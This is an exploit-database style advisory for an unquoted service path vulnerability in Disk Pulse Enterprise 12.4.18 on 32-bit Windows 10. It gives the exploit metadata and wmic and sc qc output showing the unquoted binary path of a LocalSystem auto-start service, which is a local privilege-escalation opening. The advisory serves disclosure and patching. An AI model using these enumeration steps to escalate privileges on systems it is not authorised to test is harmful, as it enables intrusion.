Disk Pulse Enterprise version 12.4.18 suffers from an unquoted service path vulnerability.
9cc4e506b91d4b3180059b65052db7b7e0378e06e993c9c6a872386aba57dd54
Exploit Title: Disk Pulse Enterprise v12.4.18 (x86) - 'Disk Pulse Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 02/10/2020
Vendor Homepage: http://www.diskpulse.com
Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v12.4.18.exe
Version: 12.4.18
Tested On: Windows 10 (32-bit)
C:\Users\zerg>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Pulse" | findstr /i /v """
Disk Pulse Enterprise C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe Auto
C:\Users\zerg>sc qc "Disk Pulse Enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Disk Pulse Enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Disk Pulse Enterprise
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem